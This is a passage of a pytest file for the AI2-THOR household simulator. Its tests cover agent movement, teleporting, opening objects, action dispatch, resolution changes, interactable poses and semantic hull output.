    e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
    position = controller.last_event.metadata["agent"]["position"]
    rotation = controller.last_event.metadata["agent"]["rotation"]
    assert rotation == dict(x=0, y=0, z=0)
    horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
    e = controller.step(dict(action="RotateRight"))
    assert e.metadata["agent"]["position"] == position
    assert e.metadata["agent"]["cameraHorizon"] == horizon
    assert e.metadata["agent"]["rotation"]["y"] == 90.0
    assert e.metadata["agent"]["rotation"]["x"] == 0.0
    assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_aabb_cache(controller):
    """The axis-aligned bounding box must track open/close state (no stale cache)."""
    objects = controller.last_event.metadata["objects"]
    obj = next(obj for obj in objects if obj["objectType"] == "Fridge")
    start_aabb = obj["axisAlignedBoundingBox"]
    open_event = controller.step(
        action="OpenObject",
        objectId=obj["objectId"],
        forceAction=True,
        raise_for_failure=True,
    )
    obj = next(
        obj for obj in open_event.metadata["objects"] if obj["objectType"] == "Fridge"
    )
    open_aabb = obj["axisAlignedBoundingBox"]
    assert start_aabb["size"] != open_aabb["size"]
    close_event = controller.step(
        action="CloseObject",
        objectId=obj["objectId"],
        forceAction=True,
        raise_for_failure=True,
    )
    obj = next(
        obj for obj in close_event.metadata["objects"] if obj["objectType"] == "Fridge"
    )
    close_aabb = obj["axisAlignedBoundingBox"]
    assert start_aabb["size"] == close_aabb["size"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable_with_filter(controller):
    """OpenObject works on a visible object even while an empty object filter is active."""
    position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
    action = position.copy()
    action["rotation"] = dict(y=90)
    action["horizon"] = 0
    action["standing"] = True
    action["action"] = "TeleportFull"
    controller.step(action, raise_for_failure=True)
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["visible"], "Object is not interactable!"
    assert_near(controller.last_event.metadata["agent"]["position"], position)
    controller.step(dict(action="SetObjectFilter", objectIds=[]))
    assert controller.last_event.metadata["objects"] == []
    controller.step(
        action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
    )
    # NOTE(review): ResetObjectFilter appears to take no objectIds argument —
    # the empty list here is presumably ignored; confirm against the API
    controller.step(dict(action="ResetObjectFilter", objectIds=[]))
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable(controller):
    """After teleporting next to the fridge, OpenObject succeeds and isOpen is set."""
    position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
    action = position.copy()
    action["rotation"] = dict(y=90)
    action["horizon"] = 0
    action["standing"] = True
    action["action"] = "TeleportFull"
    controller.step(action, raise_for_failure=True)
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["visible"], "Object is not interactable!"
    assert_near(controller.last_event.metadata["agent"]["position"], position)
    event = controller.step(
        action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
    )
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open(controller):
    """Exercise OpenObject/CloseObject `openness` semantics on the Fridge:
    valid values, out-of-range rejection, legacy moveMagnitude aliasing,
    and CloseObject resetting openness to 0."""
    objects = controller.last_event.metadata["objects"]
    obj_to_open = next(obj for obj in objects if obj["objectType"] == "Fridge")

    # helper that returns obj_to_open from a new event
    def get_object(event, object_id):
        return next(
            obj for obj in event.metadata["objects"] if obj["objectId"] == object_id
        )

    # openness == 0 must report isOpen == False
    for openness in [0.5, 0.7, 0]:
        event = controller.step(
            action="OpenObject",
            objectId=obj_to_open["objectId"],
            openness=openness,
            forceAction=True,
            raise_for_failure=True,
        )
        opened_obj = get_object(event, obj_to_open["objectId"])
        assert abs(opened_obj["openness"] - openness) < 1e-3, "Incorrect openness!"
        assert opened_obj["isOpen"] == (openness != 0), "isOpen incorrectly reported!"

    # test bad openness values
    for bad_openness in [-0.5, 1.5]:
        event = controller.step(
            action="OpenObject",
            objectId=obj_to_open["objectId"],
            openness=bad_openness,
            forceAction=True,
        )
        assert not event.metadata[
            "lastActionSuccess"
        ], "0.0 > Openness > 1.0 should fail!"

    # test backwards compatibility on moveMagnitude, where moveMagnitude
    # is now `openness`, but when moveMagnitude = 0 that corresponds to openness = 1.
    event = controller.step(
        action="OpenObject",
        objectId=obj_to_open["objectId"],
        forceAction=True,
        moveMagnitude=0,
    )
    opened_obj = get_object(event, obj_to_open["objectId"])
    assert (
        abs(opened_obj["openness"] - 1) < 1e-3
    ), "moveMagnitude=0 must have openness=1"
    assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"

    # another moveMagnitude check
    test_openness = 0.65
    event = controller.step(
        action="OpenObject",
        objectId=obj_to_open["objectId"],
        forceAction=True,
        moveMagnitude=test_openness,
    )
    opened_obj = get_object(event, obj_to_open["objectId"])
    assert (
        abs(opened_obj["openness"] - test_openness) < 1e-3
    ), "moveMagnitude is not working!"
    assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"

    # a CloseObject specific check
    event = controller.step(
        action="CloseObject", objectId=obj_to_open["objectId"], forceAction=True
    )
    obj = get_object(event, obj_to_open["objectId"])
    assert abs(obj["openness"] - 0) < 1e-3, "CloseObject openness should be 0"
    assert not obj["isOpen"], "CloseObject should report isOpen==false!"
def test_action_dispatch(fifo_controller):
    """The physics agent's dispatcher reports exactly the known ambiguous actions."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchFindAmbiguous"),
        typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
    )
    expected = [
        "ProcessControlCommand",
        "TestActionDispatchSAAmbig",
        "TestActionDispatchSAAmbig2",
    ]
    assert sorted(event.metadata["actionReturn"]) == expected
    skip_reset(fifo_controller)
def test_action_dispatch_find_ambiguous_stochastic(fifo_controller):
    """Same ambiguity report as the physics agent, on the stochastic controller."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchFindAmbiguous"),
        typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
    )
    expected = [
        "ProcessControlCommand",
        "TestActionDispatchSAAmbig",
        "TestActionDispatchSAAmbig2",
    ]
    assert sorted(event.metadata["actionReturn"]) == expected
    skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous2(fifo_controller):
    """A ServerAction colliding with a same-class signature must raise ValueError."""
    message = None
    try:
        fifo_controller.step("TestActionDispatchSAAmbig2")
    except ValueError as e:
        message = str(e)
    assert message == (
        "Ambiguous action: TestActionDispatchSAAmbig2 "
        "Signature match found in the same class"
    )
    skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous(fifo_controller):
    """Mixing a ServerAction with overloaded methods must raise ValueError."""
    message = None
    try:
        fifo_controller.step("TestActionDispatchSAAmbig")
    except ValueError as e:
        message = str(e)
    assert message == (
        "Ambiguous action: TestActionDispatchSAAmbig "
        "Mixing a ServerAction method with overloaded methods is not permitted"
    )
    skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_stochastic(fifo_controller):
    """The stochastic agent reports the single known parameter conflict."""
    event = fifo_controller.step(
        dict(action="TestActionDispatchFindConflicts"),
        typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
    )
    assert event.metadata["actionReturn"] == {
        "TestActionDispatchConflict": ["param22"]
    }
    skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_physics(fifo_controller):
    """The physics agent reports the single known parameter conflict.

    Fix: read the result via ``event.metadata["actionReturn"]`` like the
    stochastic sibling test above — the previous ``_raw_metadata`` attribute
    access is not part of the metadata mapping's interface.
    """
    event = fifo_controller.step(
        dict(action="TestActionDispatchFindConflicts"),
        typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
    )
    known_conflicts = {
        "TestActionDispatchConflict": ["param22"],
    }
    assert event.metadata["actionReturn"] == known_conflicts
    skip_reset(fifo_controller)
def test_action_dispatch_missing_args(fifo_controller):
    """Omitting a required action argument raises ValueError and sets errorCode."""
    raised = False
    try:
        event = fifo_controller.step(
            dict(action="TestActionDispatchNoop", param6="foo")
        )
        print(event.metadata["actionReturn"])
    except ValueError:
        raised = True
    assert raised
    assert fifo_controller.last_event.metadata["errorCode"] == "MissingArguments"
    skip_reset(fifo_controller)
def test_action_dispatch_invalid_action(fifo_controller):
    """An unknown action name raises ValueError with errorCode InvalidAction."""
    raised = False
    try:
        fifo_controller.step(dict(action="TestActionDispatchNoopFoo"))
    except ValueError:
        raised = True
    assert raised
    assert fifo_controller.last_event.metadata["errorCode"] == "InvalidAction"
    skip_reset(fifo_controller)
def test_action_dispatch_empty(fifo_controller):
    """No arguments at all dispatches to the empty-args overload."""
    resp = fifo_controller.step(action="TestActionDispatchNoop")
    assert resp.metadata["actionReturn"] == "emptyargs"
    skip_reset(fifo_controller)
def test_action_disptatch_one_param(fifo_controller):
    """A single argument selects the one-parameter overload."""
    resp = fifo_controller.step(action="TestActionDispatchNoop", param1=True)
    assert resp.metadata["actionReturn"] == "param1"
    skip_reset(fifo_controller)
def test_action_disptatch_two_param(fifo_controller):
    """Two arguments select the two-parameter overload."""
    resp = fifo_controller.step(
        action="TestActionDispatchNoop", param1=True, param2=False
    )
    assert resp.metadata["actionReturn"] == "param1 param2"
    skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default(fifo_controller):
    """An explicitly supplied value overrides the overload's default."""
    resp = fifo_controller.step(
        action="TestActionDispatchNoop2", param3=True, param4="foobar"
    )
    assert resp.metadata["actionReturn"] == "param3 param4/default foobar"
    skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default_empty(fifo_controller):
    """An omitted argument falls back to the overload's default value."""
    resp = fifo_controller.step(action="TestActionDispatchNoop2", param3=True)
    assert resp.metadata["actionReturn"] == "param3 param4/default foo"
    skip_reset(fifo_controller)
def test_action_disptatch_serveraction_default(fifo_controller):
    """A bare call dispatches to the ServerAction-style method."""
    resp = fifo_controller.step(action="TestActionDispatchNoopServerAction")
    assert resp.metadata["actionReturn"] == "serveraction"
    skip_reset(fifo_controller)
def test_action_disptatch_serveraction_with_object_id(fifo_controller):
    """A ServerAction method also accepts an objectId argument."""
    resp = fifo_controller.step(
        action="TestActionDispatchNoopServerAction", objectId="candle|1|2|3"
    )
    assert resp.metadata["actionReturn"] == "serveraction"
    skip_reset(fifo_controller)
def test_action_disptatch_all_default(fifo_controller):
    """A method whose parameters all have defaults dispatches with no args."""
    resp = fifo_controller.step(action="TestActionDispatchNoopAllDefault")
    assert resp.metadata["actionReturn"] == "alldefault"
    skip_reset(fifo_controller)
def test_action_disptatch_some_default(fifo_controller):
    """Supplying one of several defaulted parameters still dispatches."""
    resp = fifo_controller.step(
        action="TestActionDispatchNoopAllDefault2", param12=9.0
    )
    assert resp.metadata["actionReturn"] == "somedefault"
    skip_reset(fifo_controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead(controller):
    """MoveAhead by the default magnitude (0.25m) from the base pose."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveAhead"), raise_for_failure=True)
    agent = controller.last_event.metadata["agent"]
    assert_near(agent["position"], {"x": -1.5, "z": -1.25, "y": 0.901})
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveback(controller):
    """MoveBack by the default magnitude from the base pose."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveBack"), raise_for_failure=True)
    agent = controller.last_event.metadata["agent"]
    assert_near(agent["position"], {"x": -1.5, "z": -1.75, "y": 0.900998652})
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveleft(controller):
    """MoveLeft by the default magnitude from the base pose."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveLeft"), raise_for_failure=True)
    agent = controller.last_event.metadata["agent"]
    assert_near(agent["position"], {"x": -1.75, "z": -1.5, "y": 0.901})
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveright(controller):
    """MoveRight by the default magnitude from the base pose."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveRight"), raise_for_failure=True)
    agent = controller.last_event.metadata["agent"]
    assert_near(agent["position"], {"x": -1.25, "z": -1.5, "y": 0.901})
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_mag(controller):
    """MoveAhead honors an explicit moveMagnitude of 0.5m."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveAhead", moveMagnitude=0.5), raise_for_failure=True)
    agent = controller.last_event.metadata["agent"]
    assert_near(agent["position"], {"x": -1.5, "z": -1, "y": 0.9009983})
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_fail(controller):
    """A 5m MoveAhead runs into geometry and must report failure."""
    teleport_to_base_location(controller)
    controller.step(dict(action="MoveAhead", moveMagnitude=5.0))
    assert not controller.last_event.metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_jsonschema_metadata(controller):
    """Event metadata must validate against the checked-in JSON schema."""
    event = controller.step(dict(action="Pass"))
    schema_path = os.path.join(TESTS_DATA_DIR, "metadata-schema.json")
    with open(schema_path) as f:
        schema = json.load(f)
    jsonschema.validate(instance=event.metadata, schema=schema)
    skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_arm_jsonschema_metadata(controller):
    """Arm-agent event metadata must validate against the arm JSON schema."""
    controller.reset(agentMode="arm")
    event = controller.step(action="Pass")
    schema_path = os.path.join(TESTS_DATA_DIR, "arm-metadata-schema.json")
    with open(schema_path) as f:
        schema = json.load(f)
    jsonschema.validate(instance=event.metadata, schema=schema)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_scenes_in_build(controller):
    """Every scene committed under unity/Assets/Scenes must exist in the build."""
    on_disk = {
        os.path.splitext(os.path.basename(g))[0]
        for g in glob.glob("unity/Assets/Scenes/*.unity")
    }
    event = controller.step(dict(action="GetScenesInBuild"), raise_for_failure=True)
    in_build = set(event.metadata["actionReturn"])
    # the build may contain extra (private) scenes; disk scenes must be a subset
    missing = on_disk - in_build
    assert len(missing) == 0, "scenes in build diff: %s" % missing
    skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions(controller):
    """GetReachablePositions mirrors its result into a transient
    `reachablePositions` metadata alias that must vanish on the next event.

    Fix: the final check previously wrapped `assert False` in a bare
    `except: pass`, which swallowed the AssertionError itself and made the
    check a no-op. The exception flag is now asserted outside the handler.
    """
    event = controller.step("GetReachablePositions")
    assert (
        event.metadata["actionReturn"] == event.metadata["reachablePositions"]
    ), "reachablePositions should map to actionReturn!"
    assert len(event.metadata["reachablePositions"]) > 0 and isinstance(
        event.metadata["reachablePositions"], list
    ), "reachablePositions/actionReturn should not be empty after calling GetReachablePositions!"
    # the alias is key-access magic only; it must not be a real metadata key
    assert "reachablePositions" not in event.metadata.keys()
    event = controller.step("Pass")
    raised = False
    try:
        event.metadata["reachablePositions"]
    except Exception:
        raised = True
    assert (
        raised
    ), "reachablePositions shouldn't be available without calling action='GetReachablePositions'."
# Test for Issue: 477
def test_change_resolution_image_synthesis(fifo_controller):
    """Changing resolution up and back must reproduce the original depth,
    instance, and semantic frames and preserve the color<->objectId maps."""
    fifo_controller.reset(
        TEST_SCENE,
        width=300,
        height=300,
        renderInstanceSegmentation=True,
        renderDepthImage=True,
        renderSemanticSegmentation=True,
    )
    fifo_controller.step("RotateRight")
    first_event = fifo_controller.last_event
    first_depth_frame = fifo_controller.last_event.depth_frame
    first_instance_frame = fifo_controller.last_event.instance_segmentation_frame
    first_sem_frame = fifo_controller.last_event.semantic_segmentation_frame
    event = fifo_controller.step(action="ChangeResolution", x=500, y=500)
    assert event.depth_frame.shape == (500, 500)
    assert event.instance_segmentation_frame.shape == (500, 500, 3)
    assert event.semantic_segmentation_frame.shape == (500, 500, 3)
    event = fifo_controller.step(action="ChangeResolution", x=300, y=300)
    assert event.depth_frame.shape == (300, 300)
    assert event.instance_segmentation_frame.shape == (300, 300, 3)
    assert event.semantic_segmentation_frame.shape == (300, 300, 3)
    # after restoring the resolution, the frames must match the originals
    assert np.allclose(event.depth_frame, first_depth_frame, atol=0.001)
    assert np.array_equal(event.instance_segmentation_frame, first_instance_frame)
    assert np.array_equal(event.semantic_segmentation_frame, first_sem_frame)
    assert first_event.color_to_object_id == event.color_to_object_id
    assert first_event.object_id_to_color == event.object_id_to_color
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_change_resolution(controller):
    """ChangeResolution resizes the RGB frame; the default size is restored."""
    resp = controller.step(dict(action="Pass"), raise_for_failure=True)
    assert resp.frame.shape == (300, 300, 3)
    resp = controller.step(
        dict(action="ChangeResolution", x=400, y=400), raise_for_failure=True
    )
    assert resp.frame.shape == (400, 400, 3)
    assert (resp.screen_width, resp.screen_height) == (400, 400)
    # restore the default resolution for subsequent tests
    controller.step(
        dict(action="ChangeResolution", x=300, y=300), raise_for_failure=True
    )
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_teleport(controller):
    """Exercise Teleport/TeleportFull across the default, locobot, and drone agents.

    Fixes over the previous version:
    - the out-of-bounds loop over ["Teleport", "TeleportFull"] now actually
      uses the loop variable (it previously hard-coded "TeleportFull", so
      "Teleport" was never tested);
    - `assert False` sentinels sat inside `try` blocks whose bare
      `except: pass` swallowed the AssertionError itself, making those
      checks no-ops; the expected-failure flags are now asserted outside
      the handlers.
    """
    # Checking y coordinate adjustment works
    controller.step(
        "TeleportFull", **{**BASE_FP28_LOCATION, "y": 0.95}, raise_for_failure=True
    )
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, BASE_FP28_POSITION)
    controller.step(
        "TeleportFull",
        **{**BASE_FP28_LOCATION, "x": -2.0, "z": -2.5, "y": 0.95},
        raise_for_failure=True,
    )
    position = controller.last_event.metadata["agent"]["position"]
    assert_near(position, dict(x=-2.0, z=-2.5, y=0.901))

    # Teleporting too high
    before_position = controller.last_event.metadata["agent"]["position"]
    controller.step(
        "Teleport", **{**BASE_FP28_LOCATION, "y": 1.0},
    )
    assert not controller.last_event.metadata[
        "lastActionSuccess"
    ], "Teleport should not allow changes for more than 0.05 in the y coordinate."
    assert (
        controller.last_event.metadata["agent"]["position"] == before_position
    ), "After failed teleport, the agent's position should not change."

    # Teleporting into an object
    controller.step(
        "Teleport", **{**BASE_FP28_LOCATION, "z": -3.5},
    )
    assert not controller.last_event.metadata[
        "lastActionSuccess"
    ], "Should not be able to teleport into an object."

    # Teleporting into a wall
    controller.step(
        "Teleport", **{**BASE_FP28_LOCATION, "z": 0},
    )
    assert not controller.last_event.metadata[
        "lastActionSuccess"
    ], "Should not be able to teleport into a wall."

    # DEFAULT AGENT TEST
    # make sure Teleport works with default args
    a1 = controller.last_event.metadata["agent"]
    a2 = controller.step("Teleport", horizon=10).metadata["agent"]
    assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"

    # all should be the same except for horizon
    assert_near(a1["position"], a2["position"])
    assert_near(a1["rotation"], a2["rotation"])
    assert (
        a1["isStanding"] == a2["isStanding"]
    ), "Agent should remain in same standing when unspecified!"
    assert (
        a1["isStanding"] is not None
    ), "Agent isStanding should be set for physics agent!"

    # make sure float rotation works
    # TODO: readd this when it actually works
    # agent = controller.step('TeleportFull', rotation=25).metadata['agent']
    # assert_near(agent['rotation']['y'], 25)

    # test out of bounds with default agent
    for action in ["Teleport", "TeleportFull"]:
        failed = False
        try:
            controller.step(
                action=action,
                position=dict(x=2000, y=0, z=9000),
                rotation=dict(x=0, y=90, z=0),
                horizon=30,
                raise_for_failure=True,
            )
        except Exception:
            failed = True
        assert failed, "Out of bounds teleport not caught by physics agent"

    # Teleporting with the locobot and drone, which don't support standing
    for agent in ["locobot", "drone"]:
        event = controller.reset(agentMode=agent)
        assert event.metadata["agent"]["isStanding"] is None, agent + " cannot stand!"

        # Only degrees of freedom on the locobot
        for action in ["Teleport", "TeleportFull"]:
            event = controller.step(
                action=action,
                position=dict(x=-1.5, y=0.9, z=-1.5),
                rotation=dict(x=0, y=90, z=0),
                horizon=30,
            )
            assert event.metadata["lastActionSuccess"], (
                agent + " must be able to TeleportFull without passing in standing!"
            )
            rejected_standing = False
            try:
                event = controller.step(
                    action=action,
                    position=dict(x=-1.5, y=0.9, z=-1.5),
                    rotation=dict(x=0, y=90, z=0),
                    horizon=30,
                    standing=True,
                )
            except Exception:
                rejected_standing = True
            assert rejected_standing, (
                agent + " should not be able to pass in standing to teleport!"
            )

            # test out of bounds with the non-standing agent
            failed = False
            try:
                controller.step(
                    action=action,
                    position=dict(x=2000, y=0, z=9000),
                    rotation=dict(x=0, y=90, z=0),
                    horizon=30,
                    raise_for_failure=True,
                )
            except Exception:
                failed = True
            assert failed, "Out of bounds teleport not caught by physics agent"

        # make sure Teleport works with default args
        a1 = controller.last_event.metadata["agent"]
        a2 = controller.step("Teleport", horizon=10).metadata["agent"]
        assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"

        # all should be the same except for horizon
        assert_near(a1["position"], a2["position"])
        assert_near(a1["rotation"], a2["rotation"])

        # TODO: readd this when it actually works.
        # make sure float rotation works
        # if agent == "locobot":
        #     agent = controller.step('TeleportFull', rotation=25).metadata['agent']
        #     assert_near(agent['rotation']['y'], 25)

    controller.reset(agentMode="default")
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_interactable_poses(controller):
    """GetInteractablePoses: pose counts near the fridge, teleporting to a
    returned pose, maxPoses capping, horizons/rotations filtering, and
    maxDistance widening. Assumes FloorPlan28 with one Fridge and a Potato
    inside it."""
    fridgeId = next(
        obj["objectId"]
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    event = controller.step("GetInteractablePoses", objectId=fridgeId)
    poses = event.metadata["actionReturn"]
    assert (
        600 > len(poses) > 400
    ), "Should have around 400 interactable poses next to the fridge!"

    # teleport to a random pose
    pose = poses[len(poses) // 2]
    event = controller.step("TeleportFull", **pose)

    # assumes 1 fridge in the scene
    fridge = next(
        obj
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Fridge"
    )
    assert fridge["visible"], "Object is not interactable!"

    # tests that teleport correctly works with **syntax
    assert (
        abs(pose["x"] - event.metadata["agent"]["position"]["x"]) < 1e-3
    ), "Agent x position off!"
    assert (
        abs(pose["z"] - event.metadata["agent"]["position"]["z"]) < 1e-3
    ), "Agent z position off!"
    assert (
        abs(pose["rotation"] - event.metadata["agent"]["rotation"]["y"]) < 1e-3
    ), "Agent rotation off!"
    assert (
        abs(pose["horizon"] - event.metadata["agent"]["cameraHorizon"]) < 1e-3
    ), "Agent horizon off!"
    assert (
        pose["standing"] == event.metadata["agent"]["isStanding"]
    ), "Agent's isStanding is off!"

    # potato should be inside of the fridge (and, thus, non interactable)
    potatoId = next(
        obj["objectId"]
        for obj in controller.last_event.metadata["objects"]
        if obj["objectType"] == "Potato"
    )
    event = controller.step("GetInteractablePoses", objectId=potatoId)
    assert (
        len(event.metadata["actionReturn"]) == 0
    ), "Potato is inside of fridge, and thus, shouldn't be interactable"
    assert event.metadata[
        "lastActionSuccess"
    ], "GetInteractablePoses with Potato shouldn't have failed!"

    # assertion for maxPoses
    event = controller.step("GetInteractablePoses", objectId=fridgeId, maxPoses=50)
    assert len(event.metadata["actionReturn"]) == 50, "maxPoses should be capped at 50!"

    # assert only checking certain horizons and rotations is working correctly
    horizons = [0, 30]
    rotations = [0, 45]
    event = controller.step(
        "GetInteractablePoses",
        objectId=fridgeId,
        horizons=horizons,
        rotations=rotations,
    )
    for pose in event.metadata["actionReturn"]:
        horizon_works = False
        for horizon in horizons:
            if abs(pose["horizon"] - horizon) < 1e-3:
                horizon_works = True
                break
        assert horizon_works, "Not expecting horizon: " + pose["horizon"]
        rotation_works = False
        for rotation in rotations:
            if abs(pose["rotation"] - rotation) < 1e-3:
                rotation_works = True
                break
        assert rotation_works, "Not expecting rotation: " + pose["rotation"]

    # a rotation from which the fridge cannot be seen must yield zero poses
    event = controller.step("GetInteractablePoses", objectId=fridgeId, rotations=[270])
    assert (
        len(event.metadata["actionReturn"]) == 0
    ), "Fridge shouldn't be viewable from this rotation!"
    assert event.metadata[
        "lastActionSuccess"
    ], "GetInteractablePoses with Fridge shouldn't have failed!"

    # test maxDistance
    event = controller.step("GetInteractablePoses", objectId=fridgeId, maxDistance=5)
    assert (
        1300 > len(event.metadata["actionReturn"]) > 1100
    ), "GetInteractablePoses with large maxDistance is off!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_2d_semantic_hulls(controller):
    """Get2DSemanticHull(s) output must match the checked-in ground-truth
    polygons (compared by symmetric-difference area, tolerant of small
    cross-platform geometry differences).

    Fix: corrected the assertion-message typo "to large" -> "too large".
    """
    from shapely.geometry import Polygon

    controller.reset("FloorPlan28")
    obj_name_to_obj_id = {
        o["name"]: o["objectId"] for o in controller.last_event.metadata["objects"]
    }
    # Used to save fixed object locations.
    # with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "w") as f:
    #     json.dump(
    #         [
    #             {k: o[k] for k in ["name", "position", "rotation"]}
    #             for o in controller.last_event.metadata["objects"]
    #         ],
    #         f
    #     )
    with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "r") as f:
        fixed_obj_poses = json.load(f)
    # pin every object to its saved pose so the hulls are deterministic
    for o in fixed_obj_poses:
        teleport_success = controller.step(
            "TeleportObject",
            objectId=obj_name_to_obj_id[o["name"]],
            position=o["position"],
            rotation=o["rotation"],
            forceAction=True,
            forceKinematic=True,
            makeUnbreakable=True,
        ).metadata["lastActionSuccess"]
        assert teleport_success

    object_types = ["Tomato", "Drawer", "Fridge"]
    object_ids = [
        "Mug|-03.15|+00.82|-03.47",
        "Faucet|-00.39|+00.93|-03.61",
        "StoveBurner|-00.22|+00.92|-01.85",
    ]

    def get_rounded_hulls(**kwargs):
        # round coordinates to stabilize float comparison across platforms
        if "objectId" in kwargs:
            md = controller.step("Get2DSemanticHull", **kwargs).metadata
        else:
            md = controller.step("Get2DSemanticHulls", **kwargs).metadata
        assert md["lastActionSuccess"] and md["errorMessage"] == ""
        hulls = md["actionReturn"]
        if isinstance(hulls, list):
            return np.array(hulls, dtype=float).round(4).tolist()
        else:
            return {
                k: np.array(v, dtype=float).round(4).tolist()
                for k, v in md["actionReturn"].items()
            }

    # All objects
    hulls_all = get_rounded_hulls()
    # Filtering by object types
    hulls_type_filtered = get_rounded_hulls(objectTypes=object_types)
    # Filtering by object ids
    hulls_id_filtered = get_rounded_hulls(objectIds=object_ids)
    # Single object id
    hulls_single_object = get_rounded_hulls(objectId=object_ids[0])

    # Used to save the ground truth values:
    # objects = controller.last_event.metadata["objects"]
    # objects_poses = [
    #     {"objectName": o["name"], "position": o["position"], "rotation": o["rotation"]} for o in objects
    # ]
    # print(controller.step("SetObjectPoses", objectPoses=objects_poses).metadata)
    # with open("ai2thor/tests/data/semantic-2d-hulls.json", "w") as f:
    #     json.dump(
    #         {
    #             "all": hulls_all,
    #             "type_filtered": hulls_type_filtered,
    #             "id_filtered": hulls_id_filtered,
    #             "single_object": hulls_single_object,
    #         },
    #         f
    #     )
    with open("ai2thor/tests/data/semantic-2d-hulls.json") as f:
        truth = json.load(f)

    def assert_almost_equal(a, b):
        if isinstance(a, list):
            pa = Polygon(a)
            pb = Polygon(b)
            pa_area = pa.area
            pb_area = pb.area
            sym_diff_area = pa.symmetric_difference(pb).area
            # TODO: There seems to be a difference in the geometry reported by Unity when in
            # Linux vs Mac. I've had to increase the below check to the relatively generous <0.02
            # to get this test to pass.
            assert sym_diff_area / max([1e-6, pa_area, pb_area]) < 2e-2, (
                f"Polygons have too large an area ({sym_diff_area}) in their symmetric difference"
                f" compared to their sizes ({pa_area}, {pb_area}). Hulls:\n"
                f"{json.dumps(a)}\n"
                f"{json.dumps(b)}\n"
            )
        else:
            for k in set(a.keys()) | set(b.keys()):
                try:
                    assert_almost_equal(a[k], b[k])
                except AssertionError as e:
                    raise AssertionError(f"For {k}: {e.args[0]}")

    assert_almost_equal(truth["all"], hulls_all)
    assert_almost_equal(truth["type_filtered"], hulls_type_filtered)
    assert_almost_equal(truth["id_filtered"], hulls_id_filtered)
    assert_almost_equal(truth["single_object"], hulls_single_object)

    # Should fail when given types and ids
    assert not controller.step(
        "Get2DSemanticHulls", objectTypes=object_types, objectIds=object_ids
    ).metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
@pytest.mark.skip(reason="Colliders need to be moved closer to objects.")
def test_get_object_in_frame(controller):
    """GetObjectInFrame maps normalized screen coordinates to the objectId
    under them; exhaustively checked against instance segmentation masks.

    Fix: the final assertion message nested double quotes inside a
    double-quoted f-string (`{event.metadata["agent"]}`), a SyntaxError on
    Python < 3.12; the inner keys now use single quotes.
    """
    controller.reset(scene=TEST_SCENE, agentMode="default")
    event = controller.step(
        action="TeleportFull",
        position=dict(x=-1, y=0.900998235, z=-1.25),
        rotation=dict(x=0, y=90, z=0),
        horizon=0,
        standing=True,
    )
    assert event, "TeleportFull should have succeeded!"
    query = controller.step("GetObjectInFrame", x=0.6, y=0.6)
    assert not query, "x=0.6, y=0.6 should fail!"
    query = controller.step("GetObjectInFrame", x=0.6, y=0.4)
    assert query.metadata["actionReturn"].startswith(
        "Cabinet"
    ), "x=0.6, y=0.4 should have a cabinet!"
    query = controller.step("GetObjectInFrame", x=0.3, y=0.5)
